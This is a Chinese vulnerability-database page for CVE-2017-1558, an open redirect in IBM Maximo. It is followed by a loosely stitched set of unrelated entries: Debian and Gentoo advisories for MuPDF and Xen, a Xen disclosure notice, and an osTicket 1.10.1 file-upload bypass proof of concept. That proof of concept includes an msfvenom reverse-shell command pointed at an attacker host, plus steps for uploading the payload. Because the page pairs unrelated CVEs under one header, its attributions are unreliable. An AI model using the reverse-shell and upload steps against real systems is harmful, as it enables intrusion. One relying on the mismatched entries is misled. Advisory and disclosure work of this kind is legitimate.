CVE-2017-1558
CVSS5.8
发布时间 :2017-12-13 13:29:00
修订时间 :2017-12-27 09:11:48
NMPS    

[原文]IBM Maximo Asset Management 7.5 and 7.6 could allow a remote attacker to conduct phishing attacks, using an open redirect attack. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability to spoof the URL displayed to redirect a user to a malicious Web site that would appear to be trusted. This could allow the attacker to obtain highly sensitive information or conduct further attacks against the victim. IBM X-Force ID: 131548.


[CNNVD]CNNVD数据暂缺。


[机译]译文暂缺.

- CVSS (基础分值)

CVSS分值: 5.8 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: MEDIUM [漏洞利用存在一定的访问条件]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-601 [指向未可信站点的URL重定向(开放重定向)]

- CPE (受影响的平台与产品)

cpe:/a:ibm:maximo_asset_management:7.5
cpe:/a:ibm:maximo_asset_management:7.6
cpe:/a:ibm:maximo_asset_management_essentials:7.5

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1558
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-1558
(官方数据源) NVD

- 其它链接及资源

http://www.ibm.com/support/docview.wss?uid=swg22010595
(VENDOR_ADVISORY)  CONFIRM  http://www.ibm.com/support/docview.wss?uid=swg22010595
http://www.securityfocus.com/bid/102211
(VENDOR_ADVISORY)  BID  102211
https://exchange.xforce.ibmcloud.com/vulnerabilities/131548
(VENDOR_ADVISORY)  MISC  https://exchange.xforce.ibmcloud.com/vulnerabilities/131548

- 漏洞信息 (F144739)

Debian Security Advisory 4006-1 (PacketStormID:F144739)
2017-10-25 00:00:00
Debian  debian.org
advisory,denial of service,arbitrary,vulnerability
linux,debian
CVE-2017-14685,CVE-2017-14686,CVE-2017-14687,CVE-2017-15587
[点击下载]

Debian Linux Security Advisory 4006-1 - Multiple vulnerabilities have been found in MuPDF, a PDF file viewer, which may result in denial of service or the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4006-1                   security@debian.org
https://www.debian.org/security/                                         
October 24, 2017                      https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : mupdf
CVE ID         : CVE-2017-14685 CVE-2017-14686 CVE-2017-14687 CVE-2017-15587
Debian Bug     : 877379 879055

Multiple vulnerabilities have been found in MuPDF, a PDF file viewer, which
may result in denial of service or the execution of arbitrary code.

CVE-2017-14685, CVE-2017-14686, and CVE-2017-14687

     WangLin discovered that a crafted .xps file can crash MuPDF and
     potentially execute arbitrary code in several ways, since the
     application makes unchecked assumptions on the entry format.

CVE-2017-15587

    Terry Chia and Jeremy Heng discovered an integer overflow that can
    cause arbitrary code execution via a crafted .pdf file.

For the stable distribution (stretch), these problems have been fixed in
version 1.9a+ds1-4+deb9u1.

We recommend that you upgrade your mupdf packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEayzFlnvRveqeWJspbsLe9o/+N3QFAlnvXmEACgkQbsLe9o/+
N3RzjhAAmd9oUssec7y32MDcEl5Q5r/SPQ+SdsnHiDlaZ/Eokmjf2pAmSos4GJ0H
55nT83AIGFRMufz6BDTw10Zng4ZhWUbVXiB4dHJfk8GbyaHTq7+OGFpSr+QlbOGU
5HDGTKcBarOiuIyFXEdjJxkUWM0kq95nXP2DJQfLc3x6w3y3KkakWOHvHu29Epav
8cbbWFNVJGYCrIHr6x3W8ml3xmv33WxdTshkBA3/2ksfRGe7HLdUiRshQUETYW2R
W24dcGzym4JrOYeAEaVowg+yM1pSDi/ogWu9ca4wvSclo8CtHZ1AoyxQHC9m1VKo
dGLEpvjhfE8MXoaUqi+9MrOxQZhYEcNgAVIJd1aHGVmtYVaGa2P4b7x6m/RHTChr
bk3DHWSnrt1ctxH2mqxY4nbbFqvLC1Q221ZF3o6d6R2Y3xOes8trxQWyoUS3heNI
TBiOBuQ0SrvYRFQwUGxqnNFsKRKC7ird1o8S+fpTrWK1YOuSXLmEFRFsi9jjh2SU
HmZd/i7xeiTpGYDubWy3tgzbXcGj5h0axGnCEf2ncKmnknoSJ85Oism/JZcfzSGq
VW08893Mfa5Qsl41v9lkitWO3iWMp/pJXMhuSrVLO7yKVTKZj+n6zu7Qi+8h5fqh
FzkhVwtLYV+rKFGEIaRq9IXkHni5E1FLkBjaeRtbM1fQ44CGVLY=
=/wFe
-----END PGP SIGNATURE-----
    

- 漏洞信息 (F144747)

osTicket 1.10.1 Shell Upload (PacketStormID:F144747)
2017-10-25 00:00:00
Rajwinder Singh  
exploit,remote,shell
CVE-2017-15580
[点击下载]

osTicket version 1.10.1 suffers from a remote shell upload vulnerability.

Reference: https://becomepentester.blogspot.ae/2017/10/osTicket-File-Upload-
Restrictions-Bypassed-CVE-2017-15580.html

*# Exploit Title: File Upload Restrictions Bypassed*
*# Date: 18 October, 2017*
*# Exploit Author: Rajwinder Singh*
*# Vendor Homepage: http://osticket.com/ <http://osticket.com/>*
*# Software Link: http://osticket.com/download/go?dl=osTicket-v1.10.1.zip
<http://osticket.com/download/go?dl=osTicket-v1.10.1.zip>*
*# Version: v1.10.1*
*# CVE : 2017-15580*

Vulnerability Details:
======================
osTicket application provides a functionality to upload 'html' files with
associated formats. However, application does not properly validate the
uploaded fileas contents and thus accepts any type of files.

*Proof-of-Concept:*
====================
Uploaded shell to get reverse shell of end user for the demo purpose.

1. Created a valid '.html' file to bypass client-side validations.
<html>
<title>test</title>
<body>
<p>test page</p>
</body>

</html>

2. Created a reverse shell with '.exe' file extension using msfvenom.
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=<YOUR
IP> LPORT=4444 -b "\x00" -e <encoder> -f exe -o reverse.exe
https://www.offensive-security.com/metasploit-unleashed/binary-payloads/

3. As shown in the below screenshot, intercepted the request and changed
file extension '.html' to '.exe' and received a valid response from server
along with uploaded malicious file.


<https://3.bp.blogspot.com/-XqKsaTccLvg/WebuXgaRd7I/AAAAAAAANVs/NoWSFi9Mmwol8KxzUJQzyCSonov3yqg6gCLcBGAs/s1600/1.file_upload_extension_bypass.JPG>



*Response:*
<https://4.bp.blogspot.com/-3peKN-VR_os/Webulv3N7aI/AAAAAAAANVw/17FtsSCVNoIxTcEsfUle4VxQKYlQoBAqQCLcBGAs/s1600/2.file_upload_extension_bypass.JPG>

4. As shown in the below screenshot, successfully uploaded malicious file
on the server.
<https://4.bp.blogspot.com/-lH2vbsUDKZQ/Webu0WOio-I/AAAAAAAANV0/Jl8KFD0cHZsinpENfc1hV8OaDtcH1P0YQCLcBGAs/s1600/3.file_upload_extension_bypass.JPG>

Ready to get reverse shell.

*Affected Component:*
====================
*Parameter:* tickets.php?id=<ticket_number>#reply


*Disclosure Timeline:*
=====================
Vendor Confirmation: 11 October, 2017
Mitre Notification: 17 October, 2017
Public Disclosure: 18 October, 2017

*Exploitation Technique:*
=======================
Remote

*Severity Level:*
================
High

*Description:*
=====================================================
Request Method(s): [+] POST
Vulnerable Product: [+] osTicket - v1.10.1
Vulnerable Parameter(s): [+] tickets.php?id=<ticket_number>#reply



Thank you
    

- 漏洞信息 (F144971)

Debian Security Advisory 4006-2 (PacketStormID:F144971)
2017-11-10 00:00:00
Debian  debian.org
advisory
linux,debian
CVE-2017-15587
[点击下载]

Debian Linux Security Advisory 4006-2 - It was discovered that the original patch applied for CVE-2017-15587 in DSA-4006-1 was incomplete. Updated packages are now available to address this problem.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4006-2                   security@debian.org
https://www.debian.org/security/                                         
November 10, 2017                     https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : mupdf
CVE ID         : CVE-2017-15587
Debian Bug     : 879055

It was discovered that the original patch applied for CVE-2017-15587
in DSA-4006-1 was incomplete. Updated packages are now available to
address this problem. For reference, the relevant part of the original
advisory text follows.

CVE-2017-15587

    Terry Chia and Jeremy Heng discovered an integer overflow that can
    cause arbitrary code execution via a crafted .pdf file.

For the oldstable distribution (jessie), this problem has been fixed
in version 1.5-1+deb8u3.

For the stable distribution (stretch), this problem have been fixed in
version 1.9a+ds1-4+deb9u2.

We recommend that you upgrade your mupdf packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEayzFlnvRveqeWJspbsLe9o/+N3QFAloGD7UACgkQbsLe9o/+
N3SHXw//XanAOryOk4TuF8kEFZ3/TPdryr/64h9e9h6JC5Ro0BHX5687agJ+aDwW
D1gBgULOsdwZqppRpnT8bcIJmb9KUQPhfbeeQyhkDA7DzpAZRZunpg+Wlbe+saGA
ifrZss3y5Ys1w1PJOTOJxwKfWdwHDVwa4Z5Tj18zNBGKLM7LI9bbQ7evcKMob3rB
/SsWz0/R+GKZR5M18/0+YKIVllIH0eQI4ZCGu3FkP3oEwbdidtJP1rdc4sZWRmCk
NnJw7cotwNmAKlMUCapzK4BMEqMRmT+3eHi+UcIfh2MxDG3ecGF+Ev4Ok3H12FwG
4c3QJFaOMItMbl8U+Av7T6IwIHFPYJoCHEUekiNFIy0U7pLimE53dpZvcLM2Is9d
lqDN203nqio1znTPemafqFDCD6E+m8DDegkvAkZ/XDPuTikr4Zlp9NXsq3R54V5l
K3LjPhR7HEtu5YbhSHdnZ5Tj1WU765PTXhmu/off4GuKJV/1fRAsZ54fkPtlew0f
0Qj3pabBFNcElB2b81xjVEMHP8WdYyEoUASRUnGdbsZxEmx39ZI0j2Zu6kHJIhTO
hwhSUUmx98qBE6pq+97mXoiD4cBOqE309ycDaRWxWq16bBh7u04bv002ROZLqIrg
WY0zre1W4BQuSj7GzO1BMzNBdyuoXu0GgQ5yslgy8TkIb/BbHuU=
=gE7H
-----END PGP SIGNATURE-----
    

- 漏洞信息 (F145156)

Debian Security Advisory 4050-1 (PacketStormID:F145156)
2017-11-29 00:00:00
Debian  debian.org
advisory,denial of service,arbitrary,vulnerability
linux,debian
CVE-2017-14316,CVE-2017-14317,CVE-2017-14318,CVE-2017-14319,CVE-2017-15588,CVE-2017-15589,CVE-2017-15590,CVE-2017-15592,CVE-2017-15593,CVE-2017-15594,CVE-2017-15595,CVE-2017-15597
[点击下载]

Debian Linux Security Advisory 4050-1 - Multiple vulnerabilities have been discovered in the Xen hypervisor, which could result in denial of service, information leaks, privilege escalation or the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4050-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
November 28, 2017                     https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : xen
CVE ID         : CVE-2017-14316 CVE-2017-14317 CVE-2017-14318 CVE-2017-14319 
                 CVE-2017-15588 CVE-2017-15589 CVE-2017-15590 CVE-2017-15592 
                 CVE-2017-15593 CVE-2017-15594 CVE-2017-15595 CVE-2017-15597

Multiple vulnerabilities have been discovered in the Xen hypervisor, which
could result in denial of service, information leaks, privilege escalation
or the execution of arbitrary code.

For the oldstable distribution (jessie) a separate update will be
released.

For the stable distribution (stretch), these problems have been fixed in
version 4.8.2+xsa245-0+deb9u1.

We recommend that you upgrade your xen packages.

For the detailed security status of xen please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/xen

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAlodvOQACgkQEMKTtsN8
TjYK5BAAuPtJpa3G/+6/wZARyJh3v5ljkm7kZpKK2WTEe4EOC5TgMdkfCDjLTbV9
yCV3gwI5n3ePlnjGDHN3X1KDRbLSaMjt0vbJcrMcIuRFcGixN7Fhj5r+e3M7hmDG
HUZ+a+ifj9jJ3cqXqYm07KfXH7qxyf/NgD4IfH2IEc3BT6qdJihw+fNTt/Q2z3a5
rgeDUIbLof1zVoA0qGUUg2kbmmCQxKyPtBMG7rRLakBidjl4xu/QCT7vKbl0hubp
3ectK5Zypq3kAAn3J/i7K6yclyXoP+nrQwM+euVV44aLcAx8c0ajfwKI5vXf10JG
Km5pL42ZV0RwL6A6FBDu2zN+ZpReWNgA6OBC6t0RNCtPiJAkt8Jd0F8/Leg1iXOq
LB/jqLF3X9qLmlI1VOOThQVsgN1oKzpiP/aELUw+l+iChH4WYuGjiyUVs4D+T9k0
Wlxdgbd3bpG4NYZ4+M6vAit55VRsML8vCM5mhiPaTTz/VwcdEBEMfuZ/Q9ct2EIu
dl04xkcqfN1BqtfB7weQqG9WssiJTO/fphVxbbDaCZWT4pXcmlpy1Ct9ALWXwjjC
PtmwOmR0O6OQs9IrypmztgC0qsM8K5/duZj21ocai4Lnk/HEwXmu4IH7DL85akkJ
3pMQSwVFO3rcJoZIkPreddbCY1Xn9KXWnCsQX9BNd9Mr5GBgASs=
=kwuz
-----END PGP SIGNATURE-----
    

- 漏洞信息 (F145894)

Gentoo Linux Security Advisory 201801-14 (PacketStormID:F145894)
2018-01-15 00:00:00
Gentoo  security.gentoo.org
advisory,vulnerability
linux,gentoo
CVE-2017-12134,CVE-2017-12135,CVE-2017-12136,CVE-2017-12137,CVE-2017-15588,CVE-2017-15589,CVE-2017-15590,CVE-2017-15591,CVE-2017-15592,CVE-2017-15593,CVE-2017-15594,CVE-2017-15595,CVE-2017-17044,CVE-2017-17045,CVE-2017-17046,CVE-2017-17563,CVE-2017-17564,CVE-2017-17565,CVE-2017-17566
[点击下载]

Gentoo Linux Security Advisory 201801-14 - Multiple vulnerabilities have been found in Xen, the worst of which could allow for privilege escalation. Versions less than 4.9.1-r1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 201801-14
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                           https://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High
    Title: Xen: Multiple vulnerabilities
     Date: January 14, 2018
     Bugs: #627962, #634668, #637540, #637542, #639688, #641566
       ID: 201801-14

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities have been found in Xen, the worst of which
could allow for privilege escalation.

Background
==========

Xen is a bare-metal hypervisor.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /     Vulnerable     /            Unaffected
    -------------------------------------------------------------------
  1  app-emulation/xen           < 4.9.1-r1               >= 4.9.1-r1
  2  app-emulation/xen-tools     < 4.9.1-r1               >= 4.9.1-r1
    -------------------------------------------------------------------
     2 affected packages

Description
===========

Multiple vulnerabilities have been discovered in Xen. Please review the
referenced CVE identifiers for details.

Impact
======

A local attacker could potentially execute arbitrary code with the
privileges of the Xen (QEMU) process on the host, gain privileges on
the host system, or cause a Denial of Service condition.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Xen users should upgrade to the latest version:

  # emerge --sync
  # emerge --ask --oneshot --verbose ">=app-emulation/xen-4.9.1-r1"

All Xen tools users should upgrade to the latest version:

  # emerge --sync
  # emerge --ask --oneshot -v ">=app-emulation/xen-tools-4.9.1-r1"

References
==========

[  1 ] CVE-2017-12134
       https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-12134
[  2 ] CVE-2017-12135
       https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-12135
[  3 ] CVE-2017-12136
       https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-12136
[  4 ] CVE-2017-12137
       https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-12137
[  5 ] CVE-2017-15588
       https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-15588
[  6 ] CVE-2017-15589
       https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-15589
[  7 ] CVE-2017-15590
       https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-15590
[  8 ] CVE-2017-15591
       https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-15591
[  9 ] CVE-2017-15592
       https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-15592
[ 10 ] CVE-2017-15593
       https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-15593
[ 11 ] CVE-2017-15594
       https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-15594
[ 12 ] CVE-2017-15595
       https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-15595
[ 13 ] CVE-2017-17044
       https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-17044
[ 14 ] CVE-2017-17045
       https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-17045
[ 15 ] CVE-2017-17046
       https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-17046
[ 16 ] CVE-2017-17563
       https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-17563
[ 17 ] CVE-2017-17564
       https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-17564
[ 18 ] CVE-2017-17565
       https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-17565
[ 19 ] CVE-2017-17566
       https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-17566

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

 https://security.gentoo.org/glsa/201801-14

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.

License
=======

Copyright 2018 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5


--nwpu3OcjJZCuiX4bxjeYPaXNqDz2mYZD0--

    

- 漏洞信息

Xen CVE-2017-15589 Information Disclosure Vulnerability
Design Error 101496
Yes No
2017-10-18 12:00:00 2017-10-18 12:00:00
Roger Pau Monné of Citrix.

- 受影响的程序版本

Xen Xen 4.9
Redhat Enterprise Linux 5

- 漏洞讨论

Xen is prone to an information-disclosure vulnerability.

Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks.

Xen through 4.9.x are vulnerable; other versions may also be affected.

- 漏洞利用

Currently, we are not aware of any working exploits. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- 解决方案

Updates are available. Please see the references or vendor advisory for more information.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站